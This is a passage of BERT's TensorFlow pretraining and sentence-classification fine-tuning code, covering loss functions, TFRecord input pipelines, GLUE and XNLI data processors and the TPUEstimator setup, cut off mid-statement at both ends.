transformation before the output layer. # This matrix is not used after pre-training. with tf.variable_scope("transform"): input_tensor = tf.layers.dense( input_tensor, units=bert_config.hidden_size, activation=modeling.get_activation(bert_config.hidden_act), kernel_initializer=modeling.create_initializer( bert_config.initializer_range)) input_tensor = modeling.layer_norm(input_tensor) # The output weights are the same as the input embeddings, but there is # an output-only bias for each token. 
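# Shape sketch for the block below (batch_size=B, max_predictions_per_seq=P,
# vocab_size=V): `input_tensor` is [B*P, hidden], `logits` and `log_probs`
# are [B*P, V], and the loss is a label_weights-weighted mean of the
# per-position cross entropy; the +1e-5 in the denominator only guards
# against dividing by zero when every position is padding.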
output_bias = tf.get_variable( "output_bias", shape=[bert_config.vocab_size], initializer=tf.zeros_initializer()) logits = tf.matmul(input_tensor, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) log_probs = tf.nn.log_softmax(logits, axis=-1) label_ids = tf.reshape(label_ids, [-1]) label_weights = tf.reshape(label_weights, [-1]) one_hot_labels = tf.one_hot( label_ids, depth=bert_config.vocab_size, dtype=tf.float32) # The `positions` tensor might be zero-padded (if the sequence is too # short to have the maximum number of predictions). The `label_weights` # tensor has a value of 1.0 for every real prediction and 0.0 for the # padding predictions. per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1]) numerator = tf.reduce_sum(label_weights * per_example_loss) denominator = tf.reduce_sum(label_weights) + 1e-5 loss = numerator / denominator return (loss, per_example_loss, log_probs) def get_next_sentence_output(bert_config, input_tensor, labels): """Get loss and log probs for the next sentence prediction.""" # Simple binary classification. Note that 0 is "next sentence" and 1 is # "random sentence". This weight matrix is not used after pre-training. with tf.variable_scope("cls/seq_relationship"): output_weights = tf.get_variable( "output_weights", shape=[2, bert_config.hidden_size], initializer=modeling.create_initializer(bert_config.initializer_range)) output_bias = tf.get_variable( "output_bias", shape=[2], initializer=tf.zeros_initializer()) logits = tf.matmul(input_tensor, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) log_probs = tf.nn.log_softmax(logits, axis=-1) labels = tf.reshape(labels, [-1]) one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32) per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1) loss = tf.reduce_mean(per_example_loss) return (loss, per_example_loss, log_probs) def gather_indexes(sequence_tensor, positions): """Gathers the vectors at the specific positions over a minibatch.""" sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3) batch_size = sequence_shape[0] seq_length = sequence_shape[1] width = sequence_shape[2] flat_offsets = tf.reshape( tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1]) flat_positions = tf.reshape(positions + flat_offsets, [-1]) flat_sequence_tensor = tf.reshape(sequence_tensor, [batch_size * seq_length, width]) output_tensor = tf.gather(flat_sequence_tensor, flat_positions) return output_tensor def input_fn_builder(input_files, max_seq_length, max_predictions_per_seq, is_training, num_cpu_threads=4): """Creates an `input_fn` closure to be passed to TPUEstimator.""" def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] name_to_features = { "input_ids": tf.FixedLenFeature([max_seq_length], tf.int64), "input_mask": tf.FixedLenFeature([max_seq_length], tf.int64), "segment_ids": tf.FixedLenFeature([max_seq_length], tf.int64), "masked_lm_positions": tf.FixedLenFeature([max_predictions_per_seq], tf.int64), "masked_lm_ids": tf.FixedLenFeature([max_predictions_per_seq], tf.int64), "masked_lm_weights": tf.FixedLenFeature([max_predictions_per_seq], tf.float32), "next_sentence_labels": tf.FixedLenFeature([1], tf.int64), } # For training, we want a lot of parallel reading and shuffling. # For eval, we want no shuffling and parallel reading doesn't matter. 
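# Rough shape of the pipeline built below: for training, the shard list is
# shuffled and read with parallel_interleave (cycle_length = min(num_cpu_threads,
# number of input files)) so several TFRecord files are consumed at once,
# records are shuffled again, then map_and_batch decodes and batches them;
# for eval a single repeated TFRecordDataset suffices. drop_remainder=True is
# used in both cases because the TPU requires static batch dimensions.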
if is_training: d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files)) d = d.repeat() d = d.shuffle(buffer_size=len(input_files)) # `cycle_length` is the number of parallel files that get read. cycle_length = min(num_cpu_threads, len(input_files)) # `sloppy` mode means that the interleaving is not exact. This adds # even more randomness to the training pipeline. d = d.apply( tf.contrib.data.parallel_interleave( tf.data.TFRecordDataset, sloppy=is_training, cycle_length=cycle_length)) d = d.shuffle(buffer_size=100) else: d = tf.data.TFRecordDataset(input_files) # Since we evaluate for a fixed number of steps we don't want to encounter # out-of-range exceptions. d = d.repeat() # We must `drop_remainder` on training because the TPU requires fixed # size dimensions. For eval, we assume we are evaluating on the CPU or GPU # and we *don't* want to drop the remainder, otherwise we wont cover # every sample. d = d.apply( tf.contrib.data.map_and_batch( lambda record: _decode_record(record, name_to_features), batch_size=batch_size, num_parallel_batches=num_cpu_threads, drop_remainder=True)) return d return input_fn def _decode_record(record, name_to_features): """Decodes a record to a TensorFlow example.""" example = tf.parse_single_example(record, name_to_features) # tf.Example only supports tf.int64, but the TPU only supports tf.int32. # So cast all int64 to int32. for name in list(example.keys()): t = example[name] if t.dtype == tf.int64: t = tf.to_int32(t) example[name] = t return example def main(_): tf.logging.set_verbosity(tf.logging.INFO) if not FLAGS.do_train and not FLAGS.do_eval: raise ValueError("At least one of `do_train` or `do_eval` must be True.") bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) tf.gfile.MakeDirs(FLAGS.output_dir) input_files = [] for input_pattern in FLAGS.input_file.split(","): input_files.extend(tf.gfile.Glob(input_pattern)) tf.logging.info("*** Input Files ***") for input_file in input_files: tf.logging.info(" %s" % input_file) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) model_fn = model_fn_builder( bert_config=bert_config, init_checkpoint=FLAGS.init_checkpoint, learning_rate=FLAGS.learning_rate, num_train_steps=FLAGS.num_train_steps, num_warmup_steps=FLAGS.num_warmup_steps, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_tpu) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. 
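# Note on how the batch sizes flow from here: TPUEstimator passes the
# appropriate train/eval batch size to the input function via
# params["batch_size"], which is exactly what input_fn above reads; with
# use_tpu=False the same model_fn and input_fn run under a normal Estimator
# on CPU/GPU, as the comment above says.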
estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, eval_batch_size=FLAGS.eval_batch_size) if FLAGS.do_train: tf.logging.info("***** Running training *****") tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) train_input_fn = input_fn_builder( input_files=input_files, max_seq_length=FLAGS.max_seq_length, max_predictions_per_seq=FLAGS.max_predictions_per_seq, is_training=True) estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps) if FLAGS.do_eval: tf.logging.info("***** Running evaluation *****") tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size) eval_input_fn = input_fn_builder( input_files=input_files, max_seq_length=FLAGS.max_seq_length, max_predictions_per_seq=FLAGS.max_predictions_per_seq, is_training=False) result = estimator.evaluate( input_fn=eval_input_fn, steps=FLAGS.max_eval_steps) output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt") with tf.gfile.GFile(output_eval_file, "w") as writer: tf.logging.info("***** Eval results *****") for key in sorted(result.keys()): tf.logging.info(" %s = %s", key, str(result[key])) writer.write("%s = %s\n" % (key, str(result[key]))) if __name__ == "__main__": flags.mark_flag_as_required("input_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("output_dir") tf.app.run() File: run_classifier.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """BERT finetuning runner.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import csv import os import modeling import optimization import tokenization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string( "data_dir", None, "The input data dir. Should contain the .tsv files (or other data files) " "for the task.") flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_string("task_name", None, "The name of the task to train.") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_string( "output_dir", None, "The output directory where the model checkpoints will be written.") ## Other parameters flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_integer( "max_seq_length", 128, "The maximum total input sequence length after WordPiece tokenization. 
" "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded.") flags.DEFINE_bool("do_train", False, "Whether to run training.") flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.") flags.DEFINE_bool( "do_predict", False, "Whether to run the model in inference mode on the test set.") flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.") flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.") flags.DEFINE_integer("predict_batch_size", 8, "Total batch size for predict.") flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.") flags.DEFINE_float("num_train_epochs", 3.0, "Total number of training epochs to perform.") flags.DEFINE_float( "warmup_proportion", 0.1, "Proportion of training to perform linear learning rate warmup for. " "E.g., 0.1 = 10% of training.") flags.DEFINE_integer("save_checkpoints_steps", 1000, "How often to save the model checkpoint.") flags.DEFINE_integer("iterations_per_loop", 1000, "How many steps to make in each estimator call.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") tf.flags.DEFINE_string( "tpu_name", None, "The Cloud TPU to use for training. This should be either the name " "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 " "url.") tf.flags.DEFINE_string( "tpu_zone", None, "[Optional] GCE zone where the Cloud TPU is located in. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string( "gcp_project", None, "[Optional] Project name for the Cloud TPU-enabled project. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") class InputExample(object): """A single training/test example for simple sequence classification.""" def __init__(self, guid, text_a, text_b=None, label=None): """Constructs a InputExample. Args: guid: Unique id for the example. text_a: string. The untokenized text of the first sequence. For single sequence tasks, only this sequence must be specified. text_b: (Optional) string. The untokenized text of the second sequence. Only must be specified for sequence pair tasks. label: (Optional) string. The label of the example. This should be specified for train and dev examples, but not for test examples. """ self.guid = guid self.text_a = text_a self.text_b = text_b self.label = label class PaddingInputExample(object): """Fake example so the num input examples is a multiple of the batch size. When running eval/predict on the TPU, we need to pad the number of examples to be a multiple of the batch size, because the TPU requires a fixed batch size. The alternative is to drop the last batch, which is bad because it means the entire output data won't be generated. We use this class instead of `None` because treating `None` as padding battches could cause silent errors. 
""" class InputFeatures(object): """A single set of features of data.""" def __init__(self, input_ids, input_mask, segment_ids, label_id, is_real_example=True): self.input_ids = input_ids self.input_mask = input_mask self.segment_ids = segment_ids self.label_id = label_id self.is_real_example = is_real_example class DataProcessor(object): """Base class for data converters for sequence classification data sets.""" def get_train_examples(self, data_dir): """Gets a collection of `InputExample`s for the train set.""" raise NotImplementedError() def get_dev_examples(self, data_dir): """Gets a collection of `InputExample`s for the dev set.""" raise NotImplementedError() def get_test_examples(self, data_dir): """Gets a collection of `InputExample`s for prediction.""" raise NotImplementedError() def get_labels(self): """Gets the list of labels for this data set.""" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): """Reads a tab separated value file.""" with tf.gfile.Open(input_file, "r") as f: reader = csv.reader(f, delimiter="\t", quotechar=quotechar) lines = [] for line in reader: lines.append(line) return lines class XnliProcessor(DataProcessor): """Processor for the XNLI data set.""" def __init__(self): self.language = "zh" def get_train_examples(self, data_dir): """See base class.""" lines = self._read_tsv( os.path.join(data_dir, "multinli", "multinli.train.%s.tsv" % self.language)) examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "train-%d" % (i) text_a = tokenization.convert_to_unicode(line[0]) text_b = tokenization.convert_to_unicode(line[1]) label = tokenization.convert_to_unicode(line[2]) if label == tokenization.convert_to_unicode("contradictory"): label = tokenization.convert_to_unicode("contradiction") examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples def get_dev_examples(self, data_dir): """See base class.""" lines = self._read_tsv(os.path.join(data_dir, "xnli.dev.tsv")) examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "dev-%d" % (i) language = tokenization.convert_to_unicode(line[0]) if language != tokenization.convert_to_unicode(self.language): continue text_a = tokenization.convert_to_unicode(line[6]) text_b = tokenization.convert_to_unicode(line[7]) label = tokenization.convert_to_unicode(line[1]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples def get_labels(self): """See base class.""" return ["contradiction", "entailment", "neutral"] class MnliProcessor(DataProcessor): """Processor for the MultiNLI data set (GLUE version).""" def get_train_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "train.tsv")), "train") def get_dev_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "dev_matched.tsv")), "dev_matched") def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test_matched.tsv")), "test") def get_labels(self): """See base class.""" return ["contradiction", "entailment", "neutral"] def _create_examples(self, lines, set_type): """Creates examples for the training and dev sets.""" examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "%s-%s" % (set_type, tokenization.convert_to_unicode(line[0])) text_a = tokenization.convert_to_unicode(line[8]) text_b = 
tokenization.convert_to_unicode(line[9]) if set_type == "test": label = "contradiction" else: label = tokenization.convert_to_unicode(line[-1]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples class MrpcProcessor(DataProcessor): """Processor for the MRPC data set (GLUE version).""" def get_train_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "train.tsv")), "train") def get_dev_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev") def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test.tsv")), "test") def get_labels(self): """See base class.""" return ["0", "1"] def _create_examples(self, lines, set_type): """Creates examples for the training and dev sets.""" examples = [] for (i, line) in enumerate(lines): if i == 0: continue guid = "%s-%s" % (set_type, i) text_a = tokenization.convert_to_unicode(line[3]) text_b = tokenization.convert_to_unicode(line[4]) if set_type == "test": label = "0" else: label = tokenization.convert_to_unicode(line[0]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)) return examples class ColaProcessor(DataProcessor): """Processor for the CoLA data set (GLUE version).""" def get_train_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "train.tsv")), "train") def get_dev_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev") def get_test_examples(self, data_dir): """See base class.""" return self._create_examples( self._read_tsv(os.path.join(data_dir, "test.tsv")), "test") def get_labels(self): """See base class.""" return ["0", "1"] def _create_examples(self, lines, set_type): """Creates examples for the training and dev sets.""" examples = [] for (i, line) in enumerate(lines): # Only the test set has a header if set_type == "test" and i == 0: continue guid = "%s-%s" % (set_type, i) if set_type == "test": text_a = tokenization.convert_to_unicode(line[1]) label = "0" else: text_a = tokenization.convert_to_unicode(line[3]) label = tokenization.convert_to_unicode(line[1]) examples.append( InputExample(guid=guid, text_a=text_a, text_b=None, label=label)) return examples def convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer): """Converts a single `InputExample` into a single `InputFeatures`.""" if isinstance(example, PaddingInputExample): return InputFeatures( input_ids=[0] * max_seq_length, input_mask=[0] * max_seq_length, segment_ids=[0] * max_seq_length, label_id=0, is_real_example=False) label_map = {} for (i, label) in enumerate(label_list): label_map[label] = i tokens_a = tokenizer.tokenize(example.text_a) tokens_b = None if example.text_b: tokens_b = tokenizer.tokenize(example.text_b) if tokens_b: # Modifies `tokens_a` and `tokens_b` in place so that the total # length is less than the specified length. # Account for [CLS], [SEP], [SEP] with "- 3" _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS] and [SEP] with "- 2" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[0:(max_seq_length - 2)] # The convention in BERT is: # (a) For sequence pairs: # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . 
[SEP] # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1 # (b) For single sequences: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. The embedding vectors for `type=0` and # `type=1` were learned during pre-training and are added to the wordpiece # embedding vector (and position vector). This is not *strictly* necessary # since the [SEP] token unambiguously separates the sequences, but it makes # it easier for the model to learn the concept of sequences. # # For classification tasks, the first vector (corresponding to [CLS]) is # used as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. tokens = [] segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in tokens_a: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) if tokens_b: for token in tokens_b: tokens.append(token) segment_ids.append(1) tokens.append("[SEP]") segment_ids.append(1) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length label_id = label_map[example.label] if ex_index < 5: tf.logging.info("*** Example ***") tf.logging.info("guid: %s" % (example.guid)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids])) tf.logging.info("label: %s (id = %d)" % (example.label, label_id)) feature = InputFeatures( input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, label_id=label_id, is_real_example=True) return feature def file_based_convert_examples_to_features( examples, label_list, max_seq_length, tokenizer, output_file): """Convert a set of `InputExample`s to a TFRecord file.""" writer = tf.python_io.TFRecordWriter(output_file) for (ex_index, example) in enumerate(examples): if ex_index % 10000 == 0: tf.logging.info("Writing example %d of %d" % (ex_index, len(examples))) feature = convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer) def create_int_feature(values): f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values))) return f features = collections.OrderedDict() features["input_ids"] = create_int_feature(feature.input_ids) features["input_mask"] = create_int_feature(feature.input_mask) features["segment_ids"] = create_int_feature(feature.segment_ids) features["label_ids"] = create_int_feature([feature.label_id]) features["is_real_example"] = create_int_feature( [int(feature.is_real_example)]) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) writer.write(tf_example.SerializeToString()) writer.close() def file_based_input_fn_builder(input_file, seq_length, is_training, drop_remainder): """Creates an `input_fn` closure to be passed to TPUEstimator.""" name_to_features = { "input_ids": tf.FixedLenFeature([seq_length], tf.int64), "input_mask": tf.FixedLenFeature([seq_length], tf.int64), "segment_ids": 
tf.FixedLenFeature([seq_length], tf.int64), "label_ids": tf.FixedLenFeature([], tf.int64), "is_real_example": tf.FixedLenFeature([], tf.int64), } def _decode_record(record, name_to_features): """Decodes a record to a TensorFlow example.""" example = tf.parse_single_example(record, name_to_features) # tf.Example only supports tf.int64, but the TPU only supports tf.int32. # So cast all int64 to int32. for name in list(example.keys()): t = example[name] if t.dtype == tf.int64: t = tf.to_int32(t) example[name] = t return example def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] # For training, we want a lot of parallel reading and shuffling. # For eval, we want no shuffling and parallel reading doesn't matter. d = tf.data.TFRecordDataset(input_file) if is_training: d = d.repeat() d = d.shuffle(buffer_size=100) d = d.apply( tf.contrib.data.map_and_batch( lambda record: _decode_record(record, name_to_features), batch_size=batch_size, drop_remainder=drop_remainder)) return d return input_fn def _truncate_seq_pair(tokens_a, tokens_b, max_length): """Truncates a sequence pair in place to the maximum length.""" # This is a simple heuristic which will always truncate the longer sequence # one token at a time. This makes more sense than truncating an equal percent # of tokens from each, since if one sequence is very short then each token # that's truncated likely contains more information than a longer sequence. while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() def create_model(bert_config, is_training, input_ids, input_mask, segment_ids, labels, num_labels, use_one_hot_embeddings): """Creates a classification model.""" model = modeling.BertModel( config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) # In the demo, we are doing a simple classification task on the entire # segment. # # If you want to use the token-level output, use model.get_sequence_output() # instead. 
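# Shape sketch for the classifier head below (batch_size=B, hidden_size=H,
# num_labels=K): pooled output [B, H] -> dropout at train time -> logits
# [B, K] via output_weights [K, H] and output_bias [K] -> softmax
# probabilities plus log-probabilities -> per-example cross entropy against
# one-hot labels, averaged into the scalar training loss.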
output_layer = model.get_pooled_output() hidden_size = output_layer.shape[-1].value output_weights = tf.get_variable( "output_weights", [num_labels, hidden_size], initializer=tf.truncated_normal_initializer(stddev=0.02)) output_bias = tf.get_variable( "output_bias", [num_labels], initializer=tf.zeros_initializer()) with tf.variable_scope("loss"): if is_training: # I.e., 0.1 dropout output_layer = tf.nn.dropout(output_layer, keep_prob=0.9) logits = tf.matmul(output_layer, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) probabilities = tf.nn.softmax(logits, axis=-1) log_probs = tf.nn.log_softmax(logits, axis=-1) one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32) per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1) loss = tf.reduce_mean(per_example_loss) return (loss, per_example_loss, logits, probabilities) def model_fn_builder(bert_config, num_labels, init_checkpoint, learning_rate, num_train_steps, num_warmup_steps, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] label_ids = features["label_ids"] is_real_example = None if "is_real_example" in features: is_real_example = tf.cast(features["is_real_example"], dtype=tf.float32) else: is_real_example = tf.ones(tf.shape(label_ids), dtype=tf.float32) is_training = (mode == tf.estimator.ModeKeys.TRAIN) (total_loss, per_example_loss, logits, probabilities) = create_model( bert_config, is_training, input_ids, input_mask, segment_ids, label_ids, num_labels, use_one_hot_embeddings) tvars = tf.trainable_variables() initialized_variable_names = {} scaffold_fn = None if init_checkpoint: (assignment_map, initialized_variable_names ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op, scaffold_fn=scaffold_fn) elif mode == tf.estimator.ModeKeys.EVAL: def metric_fn(per_example_loss, label_ids, logits, is_real_example): predictions = tf.argmax(logits, axis=-1, output_type=tf.int32) accuracy = tf.metrics.accuracy( labels=label_ids, predictions=predictions, weights=is_real_example) loss = tf.metrics.mean(values=per_example_loss, weights=is_real_example) return { "eval_accuracy": accuracy, "eval_loss": loss, } eval_metrics = (metric_fn, [per_example_loss, label_ids, logits, is_real_example]) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, eval_metrics=eval_metrics, scaffold_fn=scaffold_fn) else: output_spec = 
tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions={"probabilities": probabilities}, scaffold_fn=scaffold_fn) return output_spec return model_fn # This function is not used by this file but is still used by the Colab and # people who depend on it. def input_fn_builder(features, seq_length, is_training, drop_remainder): """Creates an `input_fn` closure to be passed to TPUEstimator.""" all_input_ids = [] all_input_mask = [] all_segment_ids = [] all_label_ids = [] for feature in features: all_input_ids.append(feature.input_ids) all_input_mask.append(feature.input_mask) all_segment_ids.append(feature.segment_ids) all_label_ids.append(feature.label_id) def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] num_examples = len(features) # This is for demo purposes and does NOT scale to large data sets. We do # not use Dataset.from_generator() because that uses tf.py_func which is # not TPU compatible. The right way to load data is with TFRecordReader. d = tf.data.Dataset.from_tensor_slices({ "input_ids": tf.constant( all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32), "input_mask": tf.constant( all_input_mask, shape=[num_examples, seq_length], dtype=tf.int32), "segment_ids": tf.constant( all_segment_ids, shape=[num_examples, seq_length], dtype=tf.int32), "label_ids": tf.constant(all_label_ids, shape=[num_examples], dtype=tf.int32), }) if is_training: d = d.repeat() d = d.shuffle(buffer_size=100) d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder) return d return input_fn # This function is not used by this file but is still used by the Colab and # people who depend on it. def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer): """Convert a set of `InputExample`s to a list of `InputFeatures`.""" features = [] for (ex_index, example) in enumerate(examples): if ex_index % 10000 == 0: tf.logging.info("Writing example %d of %d" % (ex_index, len(examples))) feature = convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer) features.append(feature) return features def main(_): tf.logging.set_verbosity(tf.logging.INFO) processors = { "cola": ColaProcessor, "mnli": MnliProcessor, "mrpc": MrpcProcessor, "xnli": XnliProcessor, } tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint) if not FLAGS.do_train and not FLAGS.do_eval and not FLAGS.do_predict: raise ValueError( "At least one of `do_train`, `do_eval` or `do_predict' must be True.") bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) if FLAGS.max_seq_length > bert_config.max_position_embeddings: raise ValueError( "Cannot use sequence length %d because the BERT model " "was only trained up to sequence length %d" % (FLAGS.max_seq_length, bert_config.max_position_embeddings)) tf.gfile.MakeDirs(FLAGS.output_dir) task_name = FLAGS.task_name.lower() if task_name not in processors: raise ValueError("Task not found: %s" % (task_name)) processor = processors[task_name]() label_list = processor.get_labels() tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, 
save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) train_examples = None num_train_steps = None num_warmup_steps = None if FLAGS.do_train: train_examples = processor.get_train_examples(FLAGS.data_dir) num_train_steps = int( len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs) num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion) model_fn = model_fn_builder( bert_config=bert_config, num_labels=len(label_list), init_checkpoint=FLAGS.init_checkpoint, learning_rate=FLAGS.learning_rate, num_train_steps=num_train_steps, num_warmup_steps=num_warmup_steps, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_tpu) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, eval_batch_size=FLAGS.eval_batch_size, predict_batch_size=FLAGS.predict_batch_size) if 